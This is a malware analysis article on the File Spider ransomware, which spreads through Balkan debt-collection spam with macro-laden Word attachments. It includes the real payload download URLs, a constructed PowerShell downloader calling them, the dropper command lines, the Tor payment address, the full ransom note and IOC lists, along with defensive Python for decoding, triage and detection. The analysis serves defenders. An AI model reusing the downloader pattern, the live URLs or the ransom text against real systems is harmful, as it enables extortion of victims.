A new ransomware called File Spider is being distributed through spam that targets victims in Bosnia and Herzegovina, Serbia, and Croatia.  These spam emails contain malicious Word documents that download and install the File Spider ransomware onto the victim's computer.

File Spider Ransomware targeting the Balkans

File Spider is currently being distributed through malspam that appears to target Croatia, Bosnia and Herzegovina, and Serbia.  The emails use subject lines such as "Potrazivanje dugovanja", which translates to "Debt Collection", and their body text, according to Google Translate, is in Serbian.

Spam email example

These emails carry an attached Word document with malicious macros that poses as a debt collection notice; according to Google Translate, the document itself is written in Croatian.

Malicious Word Document

If the user clicks Enable Editing and then Enable Content, the embedded macro downloads the ransomware executables from a remote site and runs them.

Malicious Macro

The macro, shown above, contains a Base64-encoded PowerShell script that, when executed, downloads two XOR-encrypted files, enc.exe and dec.exe, from a remote site. The URLs currently used for the downloads are:

http://yourjavascript.com/5118631477/javascript-dec-2-25-2.js
http://yourjavascript.com/53103201277/javascript-enc-1-0-9.js 

After download, the files are XOR-decrypted and saved to the %AppData%\Spider folder.

The PowerShell script then executes both enc.exe, the encrypter, and dec.exe, the decrypter and GUI, with the following command lines (the Spider folder is %UserProfile%\AppData\Roaming\Spider, as in the IOC list at the end of this article; %AppData% already expands to the Roaming folder):

"%UserProfile%\AppData\Roaming\Spider\enc.exe" spider ktn 100 
"%UserProfile%\AppData\Roaming\Spider\dec.exe" spider 
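The two analyst-side steps for this stage, as an added example in Python (this is not code from the article or from the malware; the PowerShell one-liner, the fake PE bytes and the 0x5A key below are all constructed for the demo, and the assumption that the downloaded .js files are single-byte XOR-encrypted is a guess, since the article does not publish the XOR scheme): reversing powershell.exe -EncodedCommand, which takes Base64 of the UTF-16LE script text, to pull out the download URLs, then brute-forcing a single-byte XOR key over a downloaded blob until a PE image (MZ header plus the DOS stub string) appears.

```python
import base64
import re

# Constructed stand-in for the macro's payload (the real script is not reproduced in
# the article): a PowerShell one-liner of the kind a macro hands to
# powershell.exe -EncodedCommand, which expects Base64 of the UTF-16LE script text.
SAMPLE_SCRIPT = (
    "$d=$env:APPDATA+'\\Spider';"
    "$w=New-Object Net.WebClient;"
    "$w.DownloadFile('http://yourjavascript.com/53103201277/javascript-enc-1-0-9.js',$d+'\\e.bin');"
    "$w.DownloadFile('http://yourjavascript.com/5118631477/javascript-dec-2-25-2.js',$d+'\\d.bin')"
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

URL_RE = re.compile(r"""https?://[^\s'"<>),]+""")


def decode_encoded_command(b64):
    """Reverse powershell.exe -EncodedCommand: Base64 -> UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le")


def extract_urls(script):
    """Pull the download URLs out of the decoded script."""
    return URL_RE.findall(script)


# The dropped .js "files" are XOR-encrypted PE images. The article gives neither the
# key nor its length; trying every single-byte key is the first thing an analyst
# would attempt (assumption), and a PE is easy to recognise once decoded.
PE_MAGIC = b"MZ"
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_bytes(data, key):
    """Repeating-key XOR; with a one-byte key this is the single-byte case."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_pe_single_byte_xor(blob):
    """Return (key, plaintext) for the first single-byte key that yields a PE, else None."""
    for k in range(256):
        cand = xor_bytes(blob, bytes([k]))
        if cand.startswith(PE_MAGIC) and DOS_STUB in cand:
            return k, cand
    return None


# Constructed "downloaded file": a minimal fake DOS header and stub, XORed with 0x5A.
FAKE_PE = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56 + DOS_STUB + b".\r\r\n$" + b"\x00" * 16
SAMPLE_BLOB = xor_bytes(FAKE_PE, b"\x5a")

if __name__ == "__main__":
    script = decode_encoded_command(SAMPLE_ENCODED)
    print("decoded script:", script)
    print("download URLs :", extract_urls(script))
    key, pe = recover_pe_single_byte_xor(SAMPLE_BLOB)
    print("XOR key 0x%02x recovered a %d-byte PE starting %r" % (key, len(pe), pe[:2]))
```

If the single-byte search finds nothing, the next things to try on the real sample are a repeating multi-byte key (the script the macro decodes will contain it) or a key derived from the file name; the MZ/DOS-stub check works unchanged as the oracle for any of them.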

File Spider will now begin to encrypt the victim's computer.

How File Spider encrypts a computer

Once the macros in the malicious document execute, the ransomware is downloaded and executed on the computer, launching two processes, enc.exe and dec.exe. Dec.exe is the decrypter and GUI for the ransomware and quietly runs in the background until enc.exe, the encrypter, has finished encrypting the computer.

While enc.exe is running, it scans the local drives of the computer and encrypts any file whose extension matches its target list with AES-128. The file extensions targeted by File Spider are listed at the end of this article. The AES key is then encrypted using a bundled RSA key and saved 

When encrypting, it will skip files located in the following folders:

tmp
Videos
winnt
Application Data
Spider
PrefLogs
Program Files (x86)
Program Files
ProgramData
Temp
Recycle
System Volume Information
Boot
Windows

When a file is encrypted, it will log the original file name to %UserProfile%\AppData\Roaming\Spider\files.txt and append the .spider extension to the encrypted file's name. For example, a file called test.jpg would be encrypted and then renamed to test.jpg.spider.

Encrypted Spider Files

In each folder that a file is encrypted, the encryptor will also create a ransom note named HOW TO DECRYPT FILES.url, which when clicked on will open a video tutorial at the URL https://vid.me/embedded/CGyDc?autoplay=1&stats=1.

The encryptor will also create a file on the desktop called DECRYPTER.url, which launches the dec.exe file.

Finally, the enc.exe program will create a file called %UserProfile%\AppData\Roaming\Spider\5p1d3r and exit. When the dec.exe program detects that this file is created, it will display the decrypter GUI as shown below.
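The artifacts described above (the .spider extension, the files.txt log, the per-folder HOW TO DECRYPT FILES.url note, the DECRYPTER.url on the desktop, the 5p1d3r marker and the skipped-folder list) are what an incident responder inventories on a suspected victim. The Python below is an added example, not code from the article: it walks a user profile and reports those artifacts, and builds a constructed post-infection profile in a temporary directory to run against. How enc.exe compares folder names is not stated in the article, so the case-insensitive, any-path-component matching in would_be_skipped is an assumption; the body of the constructed DECRYPTER.url is likewise made up.

```python
import os
import tempfile
from pathlib import Path

# Folder names the article says enc.exe skips.
SKIPPED_FOLDERS = {
    "tmp", "Videos", "winnt", "Application Data", "Spider", "PrefLogs",
    "Program Files (x86)", "Program Files", "ProgramData", "Temp", "Recycle",
    "System Volume Information", "Boot", "Windows",
}
ENCRYPTED_EXT = ".spider"
RANSOM_NOTE = "HOW TO DECRYPT FILES.url"
SPIDER_DIR = Path("AppData") / "Roaming" / "Spider"


def would_be_skipped(rel_path):
    """True if any directory component of a profile-relative path is on the skip list.
    Assumption: matching is by folder name, case-insensitively; the article lists the
    names but not how enc.exe compares them."""
    dirs = {p.lower() for p in Path(rel_path).parts[:-1]}
    return any(name.lower() in dirs for name in SKIPPED_FOLDERS)


def triage_profile(profile_root):
    """Walk a user profile and collect the artifacts the article describes."""
    root = Path(profile_root)
    encrypted, notes = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if name == RANSOM_NOTE:
                notes.append(path)
            elif name.endswith(ENCRYPTED_EXT):
                encrypted.append(path)
    log = root / SPIDER_DIR / "files.txt"
    originals = log.read_text(encoding="utf-8").splitlines() if log.exists() else []
    return {
        "marker_present": (root / SPIDER_DIR / "5p1d3r").exists(),
        "desktop_decrypter": (root / "Desktop" / "DECRYPTER.url").exists(),
        "encrypted_files": sorted(encrypted),
        "ransom_notes": sorted(notes),
        "logged_originals": originals,
        # Sanity check on the skip list: encrypted files under a skipped folder would
        # mean the sample's targeting differs from what the article describes.
        "encrypted_in_skipped_dirs": [
            p for p in encrypted if would_be_skipped(p.relative_to(root))
        ],
    }


def build_sample_victim_tree():
    """Constructed post-infection profile for the demo; returns its root directory."""
    root = Path(tempfile.mkdtemp(prefix="spider_demo_"))
    docs = root / "Documents"
    docs.mkdir()
    (docs / "invoice.docx.spider").write_bytes(b"\x00" * 32)
    (docs / "photo.jpg.spider").write_bytes(b"\x00" * 32)
    (docs / RANSOM_NOTE).write_text(
        "[InternetShortcut]\nURL=https://vid.me/embedded/CGyDc?autoplay=1&stats=1\n")
    (root / "Windows").mkdir()
    (root / "Windows" / "notes.txt").write_text("left alone: folder is on the skip list\n")
    spider = root / SPIDER_DIR
    spider.mkdir(parents=True)
    (spider / "files.txt").write_text("Documents\\invoice.docx\nDocuments\\photo.jpg\n")
    (spider / "5p1d3r").touch()
    (root / "Desktop").mkdir()
    (root / "Desktop" / "DECRYPTER.url").write_text("[InternetShortcut]\n")  # body constructed
    return root


if __name__ == "__main__":
    report = triage_profile(build_sample_victim_tree())
    for key, value in report.items():
        print(f"{key:>26}: {value}")
```

The skip check is applied to the profile-relative path on purpose: a scan rooted in a temporary directory such as /tmp or C:\Users\x\AppData\Local\Temp would otherwise match "tmp" or "Temp" at the top of every path and mark everything as skipped.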

File Spider Start Page
File Spider Visit Website
File Spider Victim ID
File Spider Decrypt Tab

This GUI contains multiple tabs that let the victim switch the language between English and Croatian, open the Tor payment site at http://spiderwjzbmsmu7y.onion, display the victim ID code needed to log in to the Tor site, run the decrypter, and read a help file. The GUI also shows a contact email of file-spider@protonmail.ch.

When a victim visits the Tor site, they are prompted to log in using the victim ID shown in the decrypter GUI.  Once logged in, they are presented with a page that explains how to pay the ransom, currently 0.00726 bitcoin, or around $123.25, to get the files back.

Spider Decrypter Page

The ransomware is currently being analyzed, but as the AES key is encrypted with a bundled RSA key, it is unlikely that the files can be decrypted for free.

I would also like to thank @GrujaRS, @malwrhunterteam, and @B_H101 for directing me to information on how this ransomware is currently being spread. For further reading, @sdkhere has performed an analysis of this ransomware as well.

How to protect yourself from the File Spider Ransomware

In order to protect yourself from ransomware, it is important that you use good computing habits and security software. First and foremost, you should always have a reliable and tested backup of your data that can be restored in the case of an emergency, such as a ransomware attack.

You should also have security software that incorporates behavioral detections to combat ransomware and not just signature detections or heuristics. 

Last, but not least, make sure you practice the following security habits, which in many cases are the most important steps of all:

  • Backup, Backup, Backup!
  • Do not open attachments if you do not know who sent them.
  • Do not open attachments until you confirm that the person actually sent them to you.
  • Scan attachments with tools like VirusTotal.
  • Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated.
  • Make sure you have some sort of security software installed that uses behavioral detections or whitelisting technology. Whitelisting can be a pain to train, but if you're willing to stick with it, it could have the biggest payoff.
  • Use hard passwords and never reuse the same password at multiple sites.

As this particular variant arrives as a Word document with malicious macros, do not click Enable Content on documents you were not expecting, and where possible configure Office to block macros in files downloaded from the Internet so the downloader used in this campaign never runs.

For a complete guide on ransomware protection, you can visit our How to Protect and Harden a Computer against Ransomware article.


IOCs

File Hashes:

dec.exe: 74e5096f09a031800216640a8455bc487e9a32b2e56fbad9d083c3810ed5488e
enc.exe: 6500a1baa13e0698e3ed41b4465e5824e9a316b22209223754f0ab04a6e1b853

Filenames associated with the File Spider Ransomware Variant:

%UserProfile%\AppData\Roaming\Spider\
%UserProfile%\AppData\Roaming\Spider\5p1d3r
%UserProfile%\AppData\Roaming\Spider\dec.exe
%UserProfile%\AppData\Roaming\Spider\enc.exe
%UserProfile%\AppData\Roaming\Spider\files.txt
%UserProfile%\AppData\Roaming\Spider\id.txt
%UserProfile%\AppData\Roaming\Spider\run.bat
%UserProfile%\Desktop\DECRYPTER.url

Network connections:

http://spiderwjzbmsmu7y.onion
https://vid.me/embedded/CGyDc?autoplay=1&stats=1
http://yourjavascript.com/5118631477/javascript-dec-2-25-2.js
http://yourjavascript.com/53103201277/javascript-enc-1-0-9.js 
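Putting the hashes, URLs and command lines above to work in detection, as an added example in Python (not code from the article): the rules below match the two SHA-256 values, the download and video URLs, and the quoted enc.exe/dec.exe command lines against process-creation and proxy records. The process and proxy records are constructed for the demo, and the Office-spawns-PowerShell rule is standard practice for catching the macro stage rather than something the article states.

```python
import re

# Indicators taken from the article's IOC list.
SHA256_IOCS = {
    "74e5096f09a031800216640a8455bc487e9a32b2e56fbad9d083c3810ed5488e": "dec.exe",
    "6500a1baa13e0698e3ed41b4465e5824e9a316b22209223754f0ab04a6e1b853": "enc.exe",
}
URL_IOCS = {
    "http://yourjavascript.com/5118631477/javascript-dec-2-25-2.js",
    "http://yourjavascript.com/53103201277/javascript-enc-1-0-9.js",
    "https://vid.me/embedded/CGyDc?autoplay=1&stats=1",
}
# Command lines quoted in the article, anchored on the drop folder so a changed
# download URL or file hash does not evade the rule.
SPIDER_CMDLINES = {
    "enc.exe": re.compile(r'AppData\\Roaming\\Spider\\enc\.exe"?\s+spider\s+ktn\s+\d+', re.I),
    "dec.exe": re.compile(r'AppData\\Roaming\\Spider\\dec\.exe"?\s+spider\b', re.I),
}
# Generic rule (not from the article): an Office process spawning PowerShell is how
# the macro stage shows up in process-creation telemetry.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan_process_events(events):
    """events: dicts with parent, image, cmdline and sha256 (hex). Returns alert dicts."""
    alerts = []
    for ev in events:
        image = ev["image"]
        digest = ev.get("sha256", "").lower()  # hashes are matched case-insensitively
        if digest in SHA256_IOCS:
            alerts.append({"reason": "hash_match:" + SHA256_IOCS[digest], "image": image})
        if basename(ev["parent"]) in OFFICE_PARENTS and basename(image) == "powershell.exe":
            alerts.append({"reason": "office_spawned_powershell", "image": image})
        for name, rx in SPIDER_CMDLINES.items():
            if rx.search(ev["cmdline"]):
                alerts.append({"reason": "spider_cmdline:" + name, "image": image})
    return alerts


URL_RE = re.compile(r"https?://\S+")


def scan_proxy_log(lines):
    """Return the IOC URLs seen in plain-text proxy log lines, in order."""
    return [u for line in lines for u in URL_RE.findall(line) if u in URL_IOCS]


# Constructed telemetry for the demo (not real logs).
PROCESS_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc JABkAD0A...",
     "sha256": "0" * 64},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\victim\AppData\Roaming\Spider\enc.exe",
     "cmdline": r'"C:\Users\victim\AppData\Roaming\Spider\enc.exe" spider ktn 100',
     "sha256": "6500A1BAA13E0698E3ED41B4465E5824E9A316B22209223754F0AB04A6E1B853"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe",
     "sha256": "ab" * 32},
]
PROXY_LOG = [
    "10.0.0.17 GET http://yourjavascript.com/53103201277/javascript-enc-1-0-9.js 200",
    "10.0.0.17 GET http://yourjavascript.com/5118631477/javascript-dec-2-25-2.js 200",
    "10.0.0.23 GET http://example.com/index.html 200",
]

if __name__ == "__main__":
    for alert in scan_process_events(PROCESS_EVENTS):
        print("ALERT", alert["reason"], alert["image"])
    for url in scan_proxy_log(PROXY_LOG):
        print("ALERT url_ioc", url)
```

The hashes and download URLs are the most brittle indicators here, since a rebuilt enc.exe or a new hosting path defeats both; the behavioural rules (Office launching PowerShell, an executable running from %AppData%\Roaming\Spider with the spider argument) survive those changes and should be the ones kept in production.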

File Spider Ransomware Ransom Note Text:

As you may have already noticed, all your important files are encrypted and you no longer have access to them. A unique key has been generated specifically for this PC and two very strong encryption algorithm was applied in that process. Original content of your files are wiped and overwritten with encrypted data so it cannot be recovered using any conventional data recovery tool. 

The good news is that there is still a chance to recover your files, you just need to have the right key.

To obtain the key, visit our website from the menu above. You have to be fast, after 96 hours the key will be blocked and all your files will remain permanently encrypted since no one will be able to recover them without the key!

Remember, do not try anything stupid, the program has several security measures to delete all your files and cause the damage to your PC.

To avoid any misunderstanding, please read Help section.

Emails Associated with the File Spider Ransomware:

file-spider@protonmail.ch

Targeted File Extensions:

lnk, url, contact, 1cd, dbf, dt, cf, cfu, mxl, epf, kdbx, erf, vrp, grs, geo, st, conf, pff, mft, efd, 3dm, 3ds, rib, ma, sldasm, sldprt, max, blend, lwo, lws, m3d, mb, obj, x, x3d, movie, byu, c4d, fbx, dgn, dwg, 4db, 4dl, 4mp, abs, accdb, accdc, accde, accdr, accdt, accdw, accft, adn, a3d, adp, aft, ahd, alf, ask, awdb, azz, bdb, bib, bnd, bok, btr, bak, backup, cdb, ckp, clkw, cma, crd, daconnections, dacpac, dad, dadiagrams, daf, daschema, db, db-shm, db-wal, db2, db3, dbc, dbk, dbs, dbt, dbv, dbx, dcb, dct, dcx, ddl, df1, dmo, dnc, dp1, dqy, dsk, dsn, dta, dtsx, dxl, eco, ecx, edb, emd, eql, fcd, fdb, fic, fid, fil, fm5, fmp, fmp12, fmpsl, fol, fp3, fp4, fp5, fp7, fpt, fzb, fzv, gdb, gwi, hdb, his, ib, idc, ihx, itdb, itw, jtx, kdb, lgc, maq, mdb, mdbhtml, mdf, mdn, mdt, mrg, mud, mwb, s3m, myd, ndf, ns2, ns3, ns4, nsf, nv2, nyf, oce, odb, oqy, ora, orx, owc, owg, oyx, p96, p97, pan, pdb, pdm, phm, pnz, pth, pwa, qpx, qry, qvd, rctd, rdb, rpd, rsd, sbf, sdb, sdf, spq, sqb, stp, sql, sqlite, sqlite3, sqlitedb, str, tcx, tdt, te, teacher, tmd, trm, udb, usr, v12, vdb, vpd, wdb, wmdb, xdb, xld, xlgc, zdb, zdc, cdr, cdr3, ppt, pptx, 1st, abw, act, aim, ans, apt, asc, ascii, ase, aty, awp, awt, aww, bad, bbs, bdp, bdr, bean, bna, boc, btd, bzabw, chart, chord, cnm, crwl, cyi, dca, dgs, diz, dne, doc, docm, docx, docxml, docz, dot, dotm, dotx, dsv, dvi, dx, eio, eit, email, emlx, epp, err, etf, etx, euc, fadein, faq, fb2, fbl, fcf, fdf, fdr, fds, fdt, fdx, fdxt, fes, fft, flr, fodt, fountain, gtp, frt, fwdn, fxc, gdoc, gio, gpn, gsd, gthr, gv, hbk, hht, hs, htc, hwp, hz, idx, iil, ipf, jarvis, jis, joe, jp1, jrtf, kes, klg, knt, kon, kwd, latex, lbt, lis, lit, lnt, lp2, lrc, lst, ltr, ltx, lue, luf, lwp, lxfml, lyt, lyx, man, map, mbox, md5txt, me, mell, min, mnt, msg, mwp, nfo, njx, notes, now, nwctxt, nzb, ocr, odm, odo, odt, ofl, oft, openbsd, ort, ott, p7s, pages, pfs, pfx, pjt, plantuml, prt, psw, pu, pvj, pvm, pwi, pwr, qdl, rad, readme, rft, ris, rng, rpt, 
rst, rt, rtd, rtf, rtx, run, rzk, rzn, saf, safetext, sam, scc, scm, scriv, scrivx, sct, scw, sdm, sdoc, sdw, sgm, sig, skcard, sla, slagz, sls, smf, sms, ssa, strings, stw, sty, sub, sxg, sxw, tab, tdf, tex, text, thp, tlb, tm, tmv, tmx, tpc, trelby, tvj, txt, u3d, u3i, unauth, unx, uof, uot, upd, utf8, unity, utxt, vct, vnt, vw, wbk, wcf, webdoc, wgz, wn, wp, wp4, wp5, wp6, wp7, wpa, wpd, wpl, wps, wpt, wpw, wri, wsc, wsd, wsh, wtx, xbdoc, xbplate, xdl, xlf, xps, xwp, xy3, xyp, xyw, ybk, yml, zabw, zw, 2bp, 036, 3fr, 0411, 73i, 8xi, 9png, abm, afx, agif, agp, aic, albm, apd, apm, apng, aps, apx, art, artwork, arw, asw, avatar, bay, blkrt, bm2, bmp, bmx, bmz, brk, brn, brt, bss, bti, c4, cal, cals, can, cd5, cdc, cdg, cimg, cin, cit, colz, cpc, cpd, cpg, cps, cpx, cr2, ct, dc2, dcr, dds, dgt, dib, dicom, djv, djvu, dm3, dmi, vue, dpx, wire, drz, dt2, dtw, dvl, ecw, eip, exr, fal, fax, fpos, fpx, g3, gcdp, gfb, gfie, ggr, gif, gih, gim, gmbck, gmspr, spr, scad, gpd, gro, grob, hdp, hdr, hpi, i3d, icn, icon, icpr, iiq, info, int, ipx, itc2, iwi, j, j2c, j2k, jas, jb2, jbig, jbig2, jbmp, jbr, jfif, jia, jng, jp2, jpe, jpeg, jpg, jpg2, jps, jpx, jtf, jwl, jxr, kdc, kdi, kdk, kic, kpg, lbm, ljp, mac, mbm, mef, mnr, mos, mpf, mpo, mrxs, myl, ncr, nct, nlm, nrw, oc3, oc4, oc5, oci, omf, oplc, af2, af3, ai, asy, cdmm, cdmt, cdmtz, cdmz, cdt, cgm, cmx, cnv, csy, cv5, cvg, cvi, cvs, cvx, cwt, cxf, dcs, ded, design, dhs, dpp, drw, dxb, dxf, egc, emf, ep, eps, epsf, fh10, fh11, fh3, fh4, fh5, fh6, fh7, fh8, fif, fig, fmv, ft10, ft11, ft7, ft8, ft9, ftn, fxg, gdraw, gem, glox, hpg, hpgl, hpl, idea, igt, igx, imd, vbox, vdi, ink, lmk, mgcb, mgmf, mgmt, mt9, mgmx, mgtx, mmat, mat, otg, ovp, ovr, pcs, pfd, pfv, pl, plt, pm, vrml, pmg, pobj, ps, psid, rdl, scv, sk1, sk2, slddrt, snagitstamps, snagstyles, ssk, stn, svf, svg, svgz, sxd, tlc, tne, ufr, vbr, vec, vml, vsd, vsdm, vsdx, vstm, stm, vstx, wmf, wpg, vsm, vault, xar, xmind, xmmap, yal, orf, ota, oti, ozb, ozj, ozt, pal, 
pano, pap, pbm, pc1, pc2, pc3, pcd, pcx, pdd, pdn, pe4, pef, pfi, pgf, pgm, pi1, pi2, pi3, pic, pict, pix, pjpeg, pjpg, png, pni, pnm, pntg, pop, pp4, pp5, ppm, prw, psd, psdx, pse, psp, pspbrush, ptg, ptx, pvr, px, pxr, pz3, pza, pzp, pzs, z3d, qmg, ras, rcu, rgb, rgf, ric, riff, rix, rle, rli, rpf, rri, rs, rsb, rsr, rw2, rwl, s2mv, sai, sci, sep, sfc, sfera, sfw, skm, sld, sob, spa, spe, sph, spj, spp, sr2, srw, ste, sumo, sva, save, ssfn, t2b, tb0, tbn, tfc, tg4, thm, thumb, tif, tiff, tjp, tm2, tn, tpi, ufo, uga, usertile-ms, vda, vff, vpe, vst, wb1, wbc, wbd, wbm, wbmp, wbz, wdp, webp, wpb, wpe, wvl, x3f, y, ysp, zif, cdr4, cdr6, cdrw, pdf, pbd, pbl, ddoc, css, pptm, raw, cpt, tga, xpm, ani, flc, fb3, fli, mng, smil, mobi, swf, html, xls, xlsx, csv, xlsm, ods, xhtm, 7z, m2, rb, rar, wmo, mcmeta, m4a, itm, vfs0, indd, sb, mpqge, fos, p7c, wmv, mcgame, db0, p7b, vdf, DayZProfile, p12, d3dbsp, ztmp, rofl, sc2save, sis, hkx, pem, dbfv, sie, sid, bar, crt, sum, ncf, upk, cer, wb2, ibank, menu, das, der, t13, layout, t12, dmp, litemod, dxg, qdf, blob, asset, xf, esm, forge, tax, 001, r3d, pst, pkpass, vtf, bsa, bc6, dazip, apk, bc7, fpk, re4, bkp, mlx, sav, raf, qic, kf, lbf, bkf, iwd, slm, xlk, sidn, vpk, bik, mrwref, xlsb, sidd, tor, epk, mddata, psk, rgss3a, itl, rim, pak, w3x, big, icxs, fsh, unity3d, hvpl, ntl, wotreplay, crw, hplg, arch00, xxx, hkdb, lvl, desc, mdbackup, snx, py, srf, odc, syncdb, cfr, m3u, gho, ff, odp, cas, vpp_pc, js, dng, lrf, c, cpp, cs, h, bat, ps1, php, asp, java, jar, class, aaf, aep, aepx, plb, prel, prproj, aet, ppj, indl, indt, indb, inx, idml, pmd, xqx, fla, as3, as, docb, xlt, xlm, xltx, xltm, xla, xlam, xll, xlw, pot, pps, potx, potm, ppam, ppsx, ppsm, sldx, sldm, aif, iff, m4u, mid, mpa, ra, 3gp, 3g2, asf, asx, vob, m3u8, mkv, dat, efx, vcf, xml, ses, zip, 7zip, mp4, 3gp, webm, wmv